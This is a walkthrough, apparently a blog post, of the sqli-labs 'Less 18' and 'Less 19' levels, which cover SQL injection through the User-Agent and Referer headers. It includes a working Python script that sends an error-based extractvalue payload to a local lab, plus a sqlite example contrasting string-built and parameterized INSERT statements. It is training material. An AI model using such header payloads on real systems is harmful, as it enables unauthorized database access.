Less 18
Header injection: User-Agent
I won't go over HTTP header basics here. Looking straight at the source, you can see that both uname and passwd are run through the check_input function, so injecting through those two parameters is out. Reading on,
there is an SQL statement that takes two parameters, ip_address and uagent, with no check in front of either of them, so injection is possible there. The IP is normally numeric, which is more awkward to work with, so I decided to inject through uagent.
Here's a script; the real point is only the SQL statement, and I'm using a script simply because I don't know how to use the Firefox plugin (runs away)
It uses an error-based function again, and the data can be read straight from the response.
#coding:utf-8
import requests

url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"
marker = "flag"  # renamed from "str" so the builtin is not shadowed
print("start!")
key = {'uname': "admin", 'passwd': "admin"}
headers = {
    "Host": "localhost",
    # The payload goes in the User-Agent header; uname/passwd stay valid so the INSERT is reached
    "User-Agent": "'and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 5,1),'~')) and '1'='1",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    # Content-Length is left out on purpose: requests computes it from the body,
    # and a hard-coded value that does not match the body breaks the request
    "Referer": "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/",
    "Cookie": "Phpstorm-b508df8e=d3fe512f-f910-46f4-ac3f-7937af84827d",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}
res = requests.post(url, headers=headers, data=key).text
if marker in res:
    print("fish!")
    print(res)
print("end!")
And the result is
The rest is much the same; just change the statement and it all works.
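To show why validating uname and passwd is not enough, here is an added example (my own code, not the lab's PHP source) that models the Less-18 pattern: the header value is dropped straight into an INSERT. The table name and columns are assumptions, sqlite3 stands in for MySQL, and the User-Agent value is constructed; it only needs a single quote to change the query's structure, which is the same ingredient the payload above relies on.

```python
# Added example: the unchecked-header INSERT from Less-18, modelled in Python,
# beside the parameterized form that keeps header data out of the SQL text.
import sqlite3

SCHEMA = "CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)"  # assumed schema

# Constructed header values: one ordinary, one carrying a quote and a comment marker.
CLEAN_UA = "Mozilla/5.0 (X11; Linux x86_64)"
TAINTED_UA = "Mozilla/5.0 (X11; Linux) ' -- "


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def insert_unsafe(conn, uagent, ip, username):
    """String-built INSERT in the style of the lab: the header lands inside the SQL text."""
    sql = (f"INSERT INTO uagents (uagent, ip_address, username) "
           f"VALUES ('{uagent}', '{ip}', '{username}')")
    conn.execute(sql)
    conn.commit()


def insert_safe(conn, uagent, ip, username):
    """Parameterized INSERT: the driver passes values separately from the query text."""
    conn.execute("INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
                 (uagent, ip, username))
    conn.commit()


def stored_uagent(conn):
    row = conn.execute("SELECT uagent FROM uagents").fetchone()
    return row[0] if row else None


def demo(uagent=TAINTED_UA):
    """Return what each variant did with the given User-Agent header."""
    results = {}
    conn = fresh_db()
    try:
        insert_unsafe(conn, uagent, "127.0.0.1", "admin")
        results["unsafe"] = stored_uagent(conn)
    except sqlite3.Error as exc:
        # The quote ended the string literal and "--" commented out the rest:
        # the header rewrote the statement instead of being stored as data.
        results["unsafe"] = f"query broken: {exc}"
    conn = fresh_db()
    insert_safe(conn, uagent, "127.0.0.1", "admin")
    results["safe"] = stored_uagent(conn)  # stored verbatim, statement unchanged
    return results


if __name__ == "__main__":
    print(demo())
```

With the clean header both variants store the same string; with the tainted one only the parameterized INSERT still does what the application intended.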
Less 19
Header injection: Referer
Read the source, read the source. This level is basically the same as the previous one, except the injection point moves from User-Agent to Referer; tweak the script a little and it works just the same.
I won't show the details.